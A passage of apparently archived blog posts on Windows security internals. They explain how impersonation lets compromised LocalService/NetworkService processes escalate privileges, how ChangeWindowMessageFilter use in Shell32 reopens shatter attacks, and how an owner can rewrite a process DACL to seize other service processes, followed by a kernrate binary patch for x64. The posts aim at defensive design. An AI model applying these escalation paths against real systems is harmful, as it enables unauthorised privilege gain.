Now, some of you are by this point probably thinking “What’s he talking about? LocalService and NetworkService aren’t the same thing as LocalSystem.”, and to a certain extent, that is true, at least when you consider a trivial service on its own. There are many ways in which these “low privileged” services are actually more privileged than might meet the eye at first glance, however. Many of these “low privileged services” happen to work in a way such that although they don’t explicitly run with System/Administrator privileges, if the service “really wanted to”, it could get high privileges with the resources made available to it. Now, in my mind, when you are considering whether two things are equivalent from a privilege level, the proper thing to do is to consider the maximum privilege set a particular program could run with, which might not be the same as the privilege set of the account the process runs as.

To see what I mean, it’s necessary to understand an integral part of the Windows security model called impersonation. Impersonation allows one program to “borrow” the security context of another program, with that program’s consent, for purposes of performing a particular operation on behalf of that program. This is classically described as a higher privileged server that, when receiving a request from a client, obtains the privileges of the client and uses them to carry out the task in question. Thus, impersonation is often seen as a way to ensure that a high privileged server is not “tricked” into doing a dangerous operation on behalf of a client, because it “borrows” the client’s security context for the duration of the operation it is performing on behalf of that client. In other words, for the duration of that operation, the server’s privileges are effectively the same as the client’s, which often results in the server appearing to “drop privileges” temporarily.

Now, impersonation is an important part of practically all of the Windows IPC (inter-process communication) mechanisms, such as named pipes, RPC, LPC, and soforth. Aside from the use of impersonation to authoritatively identify the identity of a caller for purposes of access checks, many services use impersonation to “drop privileges” for an operation to the same level of security as a caller (such that if a “plain user” tries to make a call that does some operation requiring administrative privileges, even if the service was running with those administrative privileges originally, any resources accessed by the server during impersonation are treated as if the “plain user” accessed them. This prevents the “plain user” from successfully performing the dangerous / administrative task without the proper privileges being granted to it).

All this is well and fine, but there’s a catch: impersonation can also effectively elevate the privileges of a thread, not just lower them. Therein lies the rub with svchosts and LocalService / NetworkService accounts, since while these accounts may appear to be unprivileged at first glance, many of them operate RPC or LPC or named pipe servers that that privileged clients connect to on a regular basis. If one of these “low privileged” services is then compromised, although an attacker might not immediately be able to gain control of the system by elevating themself to LocalSystem privileges, with a bit of patience he or she can still reach the same effect. Specifically, the attacker need only take over the server part of the RPC / LPC / other IPC interface, wait for an incoming request, then impersonate the caller. If the caller happens to be highly privileged, then poof! All of a sudden the lowly, unprivileged LocalService / NetworkService just gained administrative access to the box.

Of course, the designers of the NT security system forsaw this problem a mile away, and built in features to the security system to prevent its abuse. Foremost, the caller gets to determine to what extent the server can impersonate it, via the use of a little-known attribute known as the Security Quality of Service (SQOS). Via the SQOS attribute (which can be set on any call that enables a remote server to impersonate one’s security context), a client can specify that a service can query its identity but not use that identity to perform access or privilege checks, as opposed to giving the server free reign over its identity once it connects. Secondly, in the post-Windows 2000 era, Microsoft restricted impersonation to accounts with a newly-created privilege, SeImpersonatePrivilege, which is by default only granted to LocalService / NetworkService / LocalSystem and administrative accounts.

So, impersonation isn’t really broken by design (and indeed David LeBlanc has an excellent article describing how, if used correctly, impersonation isn’t the giant security hole that you might think it is.

That being said, impersonation can still be very dangerous if misused (like many other aspects of the security system).

Coming up: A look at how all of this impersonation nonsense applies to LocalService / NetworkService (and svchost processes) in Windows (past and future versions).

Why you shouldn’t touch Change­Window­Message­Filter with a 10-ft pole…

Tuesday, July 31st, 2007

One of the things introduced with Windows Vista is the concept of something called “user interface privilege isolation”, or an attempt to allow multiple processes to coexist on one desktop even if they are running at different privilege levels, without compromising security. This new change to the security architecture with respect to how the user interface operates is also a significant part of how UAC and Internet Explorer Protected Mode can claim be to be reasonably secure, despite displaying user interfaces from differing security contexts on the same desktop.

(For reference, the Windows GUI model was designed back in the 16-bit cooperative multitasking days, where every task (yes, task – there weren’t processes or threads in Windows in those days) completely trusted every other task. Although things have improved somewhat since then, there are a number of assumptions that are so fundamental to how the Windows GUI model works that it is virtually impossible to eliminate all communication between GUI programs via window messages and still have the system function, which leads to many of the difficulties in securing user interface communications in Windows. As a result, the desktop has traditionally been considered the “security barrier” in terms of the Windows UI, such that processes of differing privilege levels should be isolated on their own desktops. Of course, since only one desktop is displayed locally at a time, this is less than convenient from an end user’s perspective.)

Most of the changes that were made in Vista relate to restrictions on just how processes from different integrity levels or user accounts can communicate eachother using the window messaging system. Window messages are typically split up into several different categories:

  1. System marshalled messages, or messages that come before WM_USER. These are messages that for compatibility with 16-bit Windows (and convenience), are automagically marshalled cross process. For example, this is why you can send the LB_ADDSTRING message to a window located in a different process, even though that message takes a pointer to a string which would obviously not be valid in the remote address space. The windowing system understands the semantics of all system marshalled messages and can thus, as the name implies, marshal them cross-process. This also means that in many circumstances, the system can also perform parameter validation in the cross process case, so that for instance a null pointer passed to LB_ADDSTRING won’t cause the remote process to crash. The system marshalled range also includes messages like WM_DESTROY, WM_QUIT, and the like. Most of the “built in” controls like the Edit and ListBox controls are “grandfathered in” to the system marshalled range, for compatibility reasons, though the newer common controls are not specially handled like this.
  2. The private window class message range, from WM_USER to 0x7FFF. These messages are specific to a particular custom window class (note that common controls, such as Rich Edit, are “custom” window classes even though you might think of them as being built in to the operating system; the windowing system ostensibly has no special knowledge of these controls, unlike the “built-in” controls like ListBox or Edit). Because the format and semantics of these messages are specific to a program-supplied window class, the window manager cannot interpret, marshal, or validate these parameters cross-process.
  3. The private application message range, from WM_APP to 0xBFFF. These window messages are specific to a program (and not a window class), though in practice it is very common for programmers to incorrectly interchange WM_USER and WM_APP for custom window classes that are internal to an application. These window messages are again completely opaque to the window manager and are essentially treated the same as private window class messages. Their intended use is to allow things like application customized subclasses of window classes to communicate with eachother (e.g. in the case where the application hooks a window procedure).
  4. The registered message range, from 0xC000 to 0xFFFF. Window messages here are dynamically assigned similarly to how atoms work in Windows. Specifically, a program passes an arbitrary string to the RegisterWindowMessage routine, which hands the application back a value in the registered message range. Any other program calling RegisterWindowMessage in the same session will receive the same window message value. These messages are, like class- and application- defined messages, opaque to the system. They are used when programs need to communicate cross-process with custom window messages, without the use of some sort of central registry where window messages would have to be permanently registered with Microsoft in order to receive a unique, non-conflicting identifier. By using an arbitrary string value (easy to make unique) and dynamically reserving a numeric message identifier at runtime, no registry is required and programs following the “standard” for that window message can still communicate with eachother. Registered window messages are not marshalled or interpreted by the windowing system.

Now, in Windows Vista, only a subset of the system marshalled messages can be sent cross process when the two processes have differnet integrity levels, and this subset of messages is heavily validated by the system, such that if a program receives a message in the system marshalled range, it can ostensibly “trust” it. Since the windowing system cannot validate custom messages (in any of the other three categories), these are all silently dropped by default in this scenario. This is typically a good thing (consider that many common control messages have pointers in their contracts and lay in the WM_USER range, making it very bad for an untrusted program to be able to send them to a privileged application). However, sometimes, one does need to send custom messages cross process. Vista provides a mechanism for this in the Change­Window­Message­Filter function, which is essentially a way to “poke a hole” in the window message “firewall” that exists between cross-integrity-level processes in Vista.

Now, this might seem like a great approach at first – after all, you’ll only use Change­Window­Message­Filter when you’re sure you can completely validate a received message even if it is from an untrusted source, such that there’s no way something could go wrong, right?

Well, the problem is that even if you do this, you are often opening your program up to attack unintentionally. Consider for a moment how custom window messages are typically used; virtually all the common controls in existance have “dangerous” messages in the custom class message range (e.g. WM_USER and friends). Additionally, many programs and third party libraries confuse WM_USER and WM_APP, such that you may have programs communicating cross process via both WM_USER and WM_APP, via “dangerous” messages that are used to make sensitive decisions or include pointer parameters.

This means that in reality, you can’t really use Change­Window­Message­Filter for a specific window message unless you are absolutely sure that nobody else in your process is listening for that message and can’t be exploited if they receive a malformed (or specially crafted) message. Right away, this pretty much excludes all WM_USER messages, and even WM_APP is highly questionably in my opinion due to how frequently components mix up WM_USER and WM_APP.

Well, that’s still not so bad, is it? After all, you can just ensure that any third party modules you use don’t do stupid things with custom window messages if you’ve got source code to them, right? Well, aside from the fact that that is in reality a pretty implausible scenario, the problem is even worse. There is rampant use of Change­Window­Message­Filter in operating system shipped libraries that your program is already using on Vista, which you have absolutely no control over. For instance, if one looks at Shell32.dll with a disassembler in Vista, one might see this in, say, the SHChangeNotifyRegister function:

mov     edx, 1          ; MSGFLT_ADD
mov     ecx, 401h       ; WM_USER + 1
call    cs:__imp_ChangeWindowMessageFilter

In other words, SHChangeNotifyRegister just promised to the window message firewall that everybody in the entire process fully validates the custom class message WM_USER + 1. Yow! The WM_USER range is the worst of any to be doing that on, especially a low WM_USER value because practically everything that uses a custom window class will use a WM_USER message for something, and the changes of a collision with the set of all custom window classes goes extremely much up that close to the start of the custom window class range. Now, just for kicks, let’s take a look at the SDK headers and see if any of the built in common controls have any interesting messages that match WM_USER + 1, or 0x401:

AclUI.h(142):#define PSPCB_SI_INITDIALOG (WM_USER + 1)
CommCtrl.h(1458):#define TB_ENABLEBUTTON (WM_USER + 1)
CommCtrl.h(2562):#define TTM_ACTIVATE (WM_USER + 1)
CommCtrl.h(6230):#define CBEM_INSERTITEMA (WM_USER + 1)
CommDlg.h(765):#define WM_CHOOSEFONT_GETLOGFONT (WM_USER + 1)
[…]

Let’s look at the documentation for some of those window messages in MSDN. Hmm, there’s CBEM_INSERTITEM[A|W], which takes, in lParam, “A pointer to a COMBOBOXEXITEM structure…”. Oh, and there’s also WM_CHOOSEFONT_GETLOGFONT, which uses lParam for a “pointer to a LOGFONT structure…”. Hmm, let me see. Anybody who calls SHChangeNotify is promising that they are not using any ComboBoxEx controls, any choosefont controls, or any of the other many hits for dangerous WM_USER + 1 messages that I didn’t list for space reasons. Oh, and that’s just the built-in controls – what happens if there’s a third party control thrown in there? What if we’re running in Internet Explorer and there’s a custom ActiveX control showing its own user interface there, blissfully unaware that some other code in the process called SHChangeNotify. That means that anybody, anywhere, who calls SHChangeNotify on Vista (or uses a library or function that calls SHChangeNotify internally, which is probably not going to be documented at all being an implementation detail) just reinvented the shatter attack with their program (congratulations!), probably without even realizing it – how would they, if they didn’t take the time to disassemble the API instead of trusting that it just works?

Now, I might be coming off a bit harsh on Microsoft here, but that’s kind of my point. Microsoft puts a lot of effort into security, and they’re the ones who designed and implemented the new the new security improvements on Vista. Sadly, this is hardly an isolated incident in Vista – with a little bit of looking, it’s very easy to find numerous other examples of system libraries that are loaded in used and called all over the place making this sort of error, which represents in my opinion a fundamental lack of understanding of how user interface security works.

Now, if the company that designed and implemented Change­Window­Message­Filter is using it wrong, how many third party developers out there that just want to get their program working under Vista in the quickest way possible with the minimum amount of effort and money spent will do the right thing? MSDN doesn’t even document this entire class of problems with Change­Window­Message­Filter that I can tell, so to be honest I think I can be fairly confident and say “virtually nobody”. It takes someone with a fairly good understanding of how the window messaging system impacts security to recognize and grasp this problem, and that only includes people who are even thinking about security in the first place when they see a function like Change­Window­Message­Filter, which I’m betting are already the vast minority.

This function is one that is pretty much all but impossible to use correctly aside from just maybe messages in the registered message range, which are already expected to be cross process and and not fully trusted (and I’m still skeptical that people will even on average get it right even in that case).

There are almost certainly other loopholes in the UIPI architecture that have yet to be discovered, if for no other reason than that it is a security bolt-on to an architecture that was designed for a single shared address space in a cooperative multitasking system. I wouldn’t say that this is so much the fault of the UIPI folks, but rather a fact that it’s just going to be ridiculously hard to make it completely safe to run programs with multiple privilege levels on the same desktop. And, remember, the “good guys” have to get it right 100% of the time from a security perspective, while the “bad guys” only need to find that one case out of 1000 that got missed in order to break the system.

So, do yourself a favor and stick to the desktop as a security barrier; the 16-bit Windows-derived window messaging system was just not designed to support programs at different privilege levels on the same desktop.

Be careful about using the built-in “low privilege” service accounts…

Wednesday, July 25th, 2007

One of the security enhancements in the Windows XP and Windows Server 2003 timeframe was to move a number of the built-in services that ship with the OS to run as a more restricted user account than LocalSystem. Specifically, two new built-in accounts akin to LocalSystem were introduced exclusively for use with services: The local service and network service accounts. These are essentially slightly more powerful than plain user accounts, but not powerful enough such that a compromise will mean the entire system is a write-off.

The intention here was to reduce the attack surface of the system as a whole, such that if a service that is running as LocalService or NetworkService is compromised, then it cannot be used to take over the system as a whole.

(For those curious, the difference between LocalService and NetworkService is only evident in domain scenarios. If the computer is joined to a domain, LocalService authenticates as a guest on the network, while NetworkService (like LocalSystem) authenticates as the computer account.)

Now, reducing the amount of code running as LocalSystem is a great thing pretty much all around, but there are some sticking points with the way the two built-in service accounts work that aren’t really covered in the documentation. Specifically, that there are a whole lot of other services that run as either LocalService or NetworkService nowadays, and by virtue of the fact that they all run as the same security context they can be compromised as one unit. In other words, if you compromise one LocalService process, you can attack all other LocalService processes, because they are running under the same security context.

Think about that for a minute. That effectively means that the attack surface of any LocalService process can in some sense be considered the sum of the attack surface of all LocalService processes on the same computer. Moreover, that means that as you offload more and more services to run as LocalService, the problem gets worse. (Although, it’s still better than the situation when everybody ran as LocalSystem, certainly.)

Windows Vista improves on this a little bit; in Vista, LocalService and NetworkService processes do have a little bit of protection from eachother, in that each service instance is assigned a unique SID that is marked as the owner for the process object (even though the process is running as LocalService or NetworkService). Furthermore, the default DACL for processes running as LocalService or NetworkService only grants access to administrators and the service-unique SID. This means that in Vista, one compromised LocalService process can’t simply use OpenProcess and WriteProcessMemory (or the like) to take complete control over another service process in Vista.

You can easily see this in action in the kernel debugger. Here’s what things look like in Vista:

kd> !process fffffa80022e0c10
PROCESS fffffa80022e0c10
[...]
    Token   fffff88001e3e060
[...]
kd> !token fffff88001e3e060
_TOKEN fffff88001e3e060
TS Session ID: 0
User: S-1-5-19
Groups:
[...]
 10 S-1-5-5-0-107490
    Attributes - Mandatory Default Enabled Owner LogonId 
[...]
kd> !object fffffa80022e0c10
Object: fffffa80022e0c10  Type: (fffffa8000654840) Process
    ObjectHeader: fffffa80022e0be0 (old version)
    HandleCount: 5  PointerCount: 96
kd> dt nt!_OBJECT_HEADER fffffa80022e0be0
[...]
   +0x028 SecurityDescriptor : 0xfffff880`01e14c26 
kd> !sd 0xfffff880`01e14c20
->Revision: 0x1
[...]
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x1c
->Dacl    : ->Ace[0]: ->Mask : 0x001fffff
->Dacl    : ->Ace[0]: ->SID: S-1-5-5-0-107490

->Dacl    : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[1]: ->AceFlags: 0x0
->Dacl    : ->Ace[1]: ->AceSize: 0x18
->Dacl    : ->Ace[1]: ->Mask : 0x00001400
->Dacl    : ->Ace[1]: ->SID: S-1-5-32-544

Looking at winnt.h, we can see that S-1-5-5-X-Y corresponds to a logon session SID. In Vista, each LocalService/NetworkService service process gets its own logon session SID.

By making the process owned by a different user than it is running as, and not allowing access to the user that the service is running as (but instead the logon session), the service is provided some measure of protection against processes in the same user context. This may not provide complete protection, though, as in general, any securable objects such as files or registry keys that contain an ACE matching against LocalService or NetworkService will be at the mercy of all such processes. To Microsoft’s credit, however, the default DACL in the token for such LocalService/NetworkService services doesn’t grant GenericAll to the user account for the service, but rather the service SID (another concept that is unique to Vista and future systems).

Furthermore, it seems like many of the ACLs that previously referred to LocalService/NetworkService are being transitioned to use service SIDs instead, which may again over time make LocalService/NetworkService once again viable, after all the third party software in the world that makes security decisions on those two SIDs is updated (hmm…), and the rest of the ACLs that refer to the old generalized SIDs that have fallen through the cracks are updated (check out AccessEnum from SysInternals to see where those ACLs have slipped through the cracks in Vista – there are at least a couple of places in WinSxS that mention LocalService or NetworkService for write access in my machine, and that isn’t even considering the registry or the more ephemeral kernel object namespace yet).

In Windows Server 2003, things are pretty bleak with respect to isolation between LocalService/NetworkService services. Service processes have direct access to eachother, as shown by their default security descriptors. The default security descriptor doesn’t allow direct access, but does allow one to rewrite it to grant oneself access as the owner field matches LocalService:

lkd> !process fffffadff39895c0 1
PROCESS fffffadff3990c20
[...]
    Token                             fffffa800132b9e0
[...]
lkd> !token fffffa800132b9e0
_TOKEN fffffa800132b9e0
TS Session ID: 0
User: S-1-5-19
Groups:
[...]
 07 S-1-5-5-0-44685
    Attributes - Mandatory Default Enabled LogonId
[...] 
lkd> !object fffffadff3990c20
Object: fffffadff3990c20  Type: (fffffadff4310a00) Process
    ObjectHeader: fffffadff3990bf0 (old version)
    HandleCount: 3  PointerCount: 21
lkd> dt nt!_OBJECT_HEADER fffffadff3990bf0
[...]
   +0x028 SecurityDescriptor : 0xfffffa80`011441ab 
[...]
lkd> !sd 0xfffffa80`011441a0
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x8004
            SE_DACL_PRESENT
            SE_SELF_RELATIVE
->Owner   : S-1-5-19
[...]
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x1c
->Dacl    : ->Ace[0]: ->Mask : 0x001f0fff
->Dacl    : ->Ace[0]: ->SID: S-1-5-5-0-44685

->Dacl    : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[1]: ->AceFlags: 0x0
->Dacl    : ->Ace[1]: ->AceSize: 0x14
->Dacl    : ->Ace[1]: ->Mask : 0x00100201
->Dacl    : ->Ace[1]: ->SID: S-1-5-18

Again looking at winnt.h, we clearly see that S-1-5-19 is LocalService. So, there is absolutely no protection at all from one compromised LocalService process attacking another, at least in Windows Server 2003.

Note that if you are marked as the owner of an object, you can rewrite the DACL freely by requesting a handle with WRITE_DAC access and then modifying the DACL field with a function like SetKernelObjectSecurity. From there, all you need to do is re-request a handle with the desired access, after modifying the security descriptor to grant yourself said access. This is easy to verify experimentally by writing a test service that runs as LocalService and requesting WRITE_DAC in an OpenProcess call for another LocalService service process.

To make matters worse, nowadays most services run in shared svchost processes, which means if one process in that svchost is compromised, the whole process is a write off.

I would recommend seriously considering using dedicated unique user accounts for your services in certain scenarios as a result of this unpleasant mess. In the case where you have a security sensitive service that doesn’t need high privileges (i.e. it doesn’t require LocalSystem), it is often the wrong thing to do to just stuff it in with the rest of the LocalService or NetworkService services due to the vastly increased attack surface over running as a completely isolated user account, even if setting up a unique user account is a pain to do programmatically.

Note that although Vista attempts to mitigate this problem by ensuring that LocalService/NetworkService services cannot directly interfere with eachother in the most obvious sense of opening eachother’s processes and writing code into eachother’s address spaces, this is really only a small measure of protection due to the problem that one LocalService process’s data files are at the mercy of every other LocalService process out there. I think that it would be extremely unwise to stake your system security on there being no way to compromise one LocalService process from another in Vista, even with its mitigations; it may be slightly more difficult, but I’d hardly write it off as impossible.

Given all of this, I would steer clear of NetworkService and LocalService for sensitive but unprivileged processes (and yes, I would consider such a thing a real scenario, as you don’t need to be a computer administrator to store valuable data on a computer; you just need there to not be an untrusted (or compromised) computer administrator on the box).

One thing I am actually kind of curious about is what the SWI rationale is for even allowing the svchost paradigm by default, given how it tends to (negatively, from the perspective of system security) multiply the attack surface of all svchost’d processes. Using svchosts completely blows away the security improvements Vista makes to LocalService / NetworkService, as far as I can tell. Even though there are some services that are partitioned off in their own svchosts, there’s still one giant svchost group in Vista that has something on the order of like ~20 services in it (ugh!). Not to mention that svchosts make debugging a nightmare, but that’s a topic for another posting.

Update: Andrew Rogers pointed out that I originally posted the security descriptor for a LocalSystem process in the Windows Server 2003 example, instead of for a LocalService process. Whoops! It actually turns out that contrary to what I originally wrote, the DACL on LocalService processes on Windows Server 2003 doesn’t explicitly allow access to LocalService, but LocalService is still named as the object owner, so it is trivial to gain that access anyway, as previously mentioned (at least for Windows Server 2003).

Why doesn’t the publicly available kernrate work on Windows x64? (and how to fix it)

Monday, June 4th, 2007

Previously, I wrote up an introduction to kernrate (the Windows kernel profiler). In that post, I erroneously stated that the KrView distribution includes a version of kernrate that works on x64. Actually, it supports IA64 and x86, but not x64. A week or two ago, I had a problem on an x64 box of mine that I wanted to help track down using kernrate. Unfortunately, I couldn’t actually find a working kernrate for Windows x64 (Srv03 / Vista).

It turns out that nowhere is there a published kernrate that works on any production version of Windows x64. KrView ships with an IA64 version, and the Srv03 resource kit only ships with an x86 version only. (While you can run the x86 version of kernrate in Wow64, you can’t use it to profile kernel mode; for that, you need a native x64 version.)

A bit of digging turned up a version of kernrate labeled ‘AMD64’ in the Srv03 SP0 DDK (the 3790.1830 / Srv03 SP1 DDK doesn’t include kernrate at all, only documentation for it, and the 6000 WDK omits even the documentation, which is really quite a shame). Unfortunately, that version of kernrate, while compiled as native x64 and theoretically capable of profiling the x64 kernel, doesn’t actually work. If you try to run it, you’ll get the following error:

NtQuerySystemInformation failed status c0000004
KERNRATE: Failed to get SYSTEM_BASIC_INFORMATION

So, no dice even with the Srv03 SP0 DDK version of kernrate, or so I thought. Ironically, the various flavors of x86 (including 3790.0) kernrate I could find all worked on Srv03 x64 SP1 (3790.1830) / Vista x64 SP0 (6000.0), but as I mentioned earlier, you can’t use the profiling APIs to profile kernel mode from a Wow64 program. So, I had a kernrate that worked but couldn’t profile kernel mode, and a kernrate that should have worked and been able to profile kernel mode except that it bombed out right away.

After running into that wall, I decided to try and get ahold of someone at Microsoft who I suspected might be able to help, Andrew Rogers from the Windows Serviceability group. After trading mails (and speculation) back and forth a bit, we eventually determined just what was going on with that version of kernrate.

To understand what the deal is with the 3790.0 DDK x64 version of kernrate, a little history lesson is in order. When the production (“RTM”) version of Windows Server 2003 was released, it was supported on two platforms: x86, and IA64 (“Windows Server 2003 64-bit”). This continued until the Srv03 Service Pack 1 timeframe, when support for another platform “went gold” – x64 (or AMD64). Now, this means that the production code base for Srv03 x64 RTM (3790.1830) is essentially comparable to Srv03 x86 SP1 (3790.1830). While normally, there aren’t “breaking changes” (or at least, these are tried to kept to a minimum) from service pack to service pack, Srv03 x64 is kind of a special case.

You see, there was no production / RTM release of Srv03 x64 3790.0, or a “Service Pack 0” for the x64 platform. As a result, in a special case, it was acceptable for there to be breaking changes from 3790.0/x64 to 3790.1830/x64, as pre-3790.1830 builds could essentially be considered beta/RC builds and not full production releases (and indeed, they were not generally publicly available as in a normal production release).

If you’re following me this far, you’re might be thinking “wait a minute, didn’t he say that the 3790.0 x86 build of kernrate worked on Srv03 3790.1830?” – and in fact, I did imply that (it does work). The breaking change in this case only relates to 64-bit-specific parts, which for the most part excludes things visible to 32-bit programs (such as the 3790.0 x86 kernrate).

In this particular case, it turns out that part of the SYSTEM_BASIC_INFORMATION structure was changed from the 3790.0 timeframe to the 3790.1830 timeframe, with respect to x64 platforms.

The 3790.0 structure, as viewed from x64 builds, is approximately like this:

typedef struct _SYSTEM_BASIC_INFORMATION_3790 {
    ULONG Reserved;
    ULONG TimerResolution;
    ULONG PageSize;
    ULONG_PTR NumberOfPhysicalPages;
    ULONG_PTR LowestPhysicalPageNumber;
    ULONG_PTR HighestPhysicalPageNumber;
    ULONG AllocationGranularity;
    ULONG_PTR MinimumUserModeAddress;
    ULONG_PTR MaximumUserModeAddress;
    KAFFINITY ActiveProcessorsAffinityMask;
    CCHAR NumberOfProcessors;
} SYSTEM_BASIC_INFORMATION_3790, *PSYSTEM_BASIC_INFORMATION_3790;

However, by the time 3790.1830 (the “RTM” version of Srv03 x64 / XP x64) was released, a subtle change had been made:

typedef struct _SYSTEM_BASIC_INFORMATION {
	ULONG Reserved;
	ULONG TimerResolution;
	ULONG PageSize;
	ULONG NumberOfPhysicalPages;
	ULONG LowestPhysicalPageNumber;
	ULONG HighestPhysicalPageNumber;
	ULONG AllocationGranularity;
	ULONG_PTR MinimumUserModeAddress;
	ULONG_PTR MaximumUserModeAddress;
	KAFFINITY ActiveProcessorsAffinityMask;
	CCHAR NumberOfProcessors;
} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION;

Essentially, three ULONG_PTR fields were “contracted” from 64-bits to 32-bits (by changing the type to a fixed-length type, such as ULONG). The cause for this relates again to the fact that the first 64-bit RTM build of Srv03 was for IA64, and not x64 (in other words, “64-bit Windows” originally just meant “Windows for Itanium”, something that is to this day still unfortunately propagated in certain MSDN documentation).

According to Andrew, the reasoning behind the difference in the two structure versions is that those three fields were originally defined as either a pointer-sized data type (such as SIZE_T or ULONG_PTR – for 32-bit builds), or a 32-bit data type (such as ULONG – for 64-bit builds) in terms of the _IA64_ preprocessor constant, which indicates an Itanium build. However, 64-bit builds for x64 do not use the _IA64_ constant, which resulted in the structure fields being erroneously expanded to 64-bits for the 3790.0/x64 builds. By the time Srv03 x64 RTM (3790.1830) had been released, the page counts had been fixed to be defined in terms of the _WIN64 preprocessor constant (indicating any 64-bit build, not just an Itanium build). As a result, the fields that were originally 64-bits long for the prerelease 3790.0/x64 build became only 32-bits long for the RTM 3790.1830/x64 production build. Note that due to the fact the page counts are expressed in terms of a count of physical pages, which are at least 4096 bytes for x86 and x64 (and significantly more for large physical pages on those platforms), keeping them as a 32-bit quantity is not a terribly limiting factor on total physical memory given today’s technology, and that of the foreseeable future, at least relating to systems that NT-based kernels will operate on).

The end result of this change is that the SYSTEM_BASIC_INFORMATION structure that kernrate 3790.0/x64 tries to retrieve is incompatible with the 3790.1830/x64 (RTM) version of Srv03, hence the call failing with c0000004 (otherwise known as STATUS_INFO_LENGTH_MISMATCH). The culimination of this is that the 3790.0/x64 version of kernrate will abort on production builds of Srv03, as the SYSTEM_BASIC_INFORMATION structure format is incompatible with the version kernrate is expecting.

Normally, this would be pretty bad news; the program was compiled against a different layout of an OS-supplied structure. Nonetheless, I decided to crack open kernrate.exe with IDA and HIEW to see what I could find, in the hopes of fixing the binary to work on RTM builds of Srv03 x64. It turned out that I was in luck, and there was only one place that actually retrieved the SYSTEM_BASIC_INFORMATION structure, storing it in a global variable for future reference. Unfortunately, there were a great many references to that global; too many to be practical to fix to reflect the new structure layout.

However, since there was only one place where the SYSTEM_BASIC_INFORMATION structure was actually retrieved (and even more, it was in an isolated, dedicated function), there was another option: Patch in some code to retrieve the 3790.1830/x64 version of SYSTEM_BASIC_INFORMATION, and then convert it to appear to kernrate as if it were actually the 3790.0/x64 layout. Unfortunately, a change like this involves adding new code to an existing binary, which means that there needs to be a place to put it. Normally, the way you do this when patching a binary on-disk is to find some padding between functions, or at the end of a PE section that is marked as executable but otherwise unused, and place your code there. For large patches, this may involve “spreading” the patch code out among various different “slices” of padding, if there is no one contiguous block that is long enough to contain the entire patch.

In this case, however, due to the fact that the routine to retrieve the SYSTEM_BASIC_INFORMATION structure was a dedicated, isolated routine, and that it had some error handling code for “unlikely” situations (such as failing a memory allocation, or failing the NtQuerySystemInformation(…SystemBasicInformation…) call (although, it would appear the latter is not quite so “unlikely” in this case), a different option presented itself: Dispense with the error checking, most of which would rarely be used in a realistic situation, and use the extra space to write in some code to convert the structure layout to the version expected by kernrate 3790.0. Obviously, while not a completely “clean” solution per se, the idea does have its merits when you’re already into patch-the-binary-on-disk-land (which pretty much rules out the idea of a “clean” solution altogether at that point).

The structure conversion is fairly straightforward code, and after a bit of poking around, I had a version to try out. Lo and behold, it actually worked; it turns out that the only thing that was preventing the prerelease 3790.0/x64 kernrate from doing basic kernel profiling on production x64 kernels was the layout of the SYSTEM_BASIC_INFORMATION structure.

For those so inclined, the patch I created effectively rewrites the original version of the function, as shown below after translated to C:

PSYSTEM_BASIC_INFORMATION_3790
GetSystemBasicInformation(
 VOID
 )
{
 PSYSTEM_BASIC_INFORMATION_3790 Sbi;
 NTSTATUS                       Status;

 Sbi = (PSYSTEM_BASIC_INFORMATION_3790)malloc(
  sizeof(SYSTEM_BASIC_INFORMATION_3790));

 if (!Sbi)
 {
  fprintf(stderr, "Buffer allocation failed"
   " for SystemInformation in "
   "GetSystemBasicInformation\\n");
  exit(1);
 }

 if (!NT_SUCCESS((Status = NtQuerySystemInformation(
  SystemBasicInformation,
  Sbi,
  sizeof(SYSTEM_BASIC_INFORMATION_3790),
  0))))
 {
  fprintf(stderr, "NtQuerySystemInformation failed"
   " status %08lx\\n",
   Status);
  free(Sbi);

  Sbi = 0;
 }

 return Sbi;
}

Conceptually represented in C, the modified (patched) function would appear something like the following (note that the error checking code has been removed to make room for the structure conversion logic, as previously mentioned; the substantial new changes are colored in red):

(Note that the patch code was not compiler-generated and is not truly a function written in C; below is simply how it would look if it were translated from assembler to C.)

PSYSTEM_BASIC_INFORMATION_3790
GetSystemBasicInformationFixed(
 VOID
 )
{
 PSYSTEM_BASIC_INFORMATION_3790 Sbi;
 PSYSTEM_BASIC_INFORMATION      SbiReal;

 Sbi     = (PSYSTEM_BASIC_INFORMATION_3790)malloc(
  sizeof(SYSTEM_BASIC_INFORMATION_3790));
 SbiReal = (PSYSTEM_BASIC_INFORMATION)Sbi;

 NtQuerySystemInformation(
  SystemBasicInformation,
  SbiReal,
  sizeof(SYSTEM_BASIC_INFORMATION),
  0);

 Sbi->NumberOfProcessors           =
  SbiReal->NumberOfProcessors;
 Sbi->ActiveProcessorsAffinityMask =
  SbiReal->ActiveProcessorsAffinityMask;
 Sbi->MaximumUserModeAddress       =
  SbiReal->MaximumUserModeAddress;
 Sbi->MinimumUserModeAddress       =
  SbiReal->MinimumUserModeAddress;
 Sbi->AllocationGranularity        =
  SbiReal->AllocationGranularity;
 Sbi->HighestPhysicalPageNumber    =
  SbiReal->HighestPhysicalPageNumber;
 Sbi->LowestPhysicalPageNumber     =
  SbiReal->LowestPhysicalPageNumber;
 Sbi->NumberOfPhysicalPages        =
  SbiReal->NumberOfPhysicalPages;

 return Sbi;
}

(The structure can be converted in-place due to how the two versions are laid out in memory; the “expected” version is larger than the “real” version (and more specifically, the offsets of all the fields we care about are greater in the “expected” version than the “real” version), so structure fields can safely be copied from the tail of the “real” structure to the tail of the “expected” structure.)

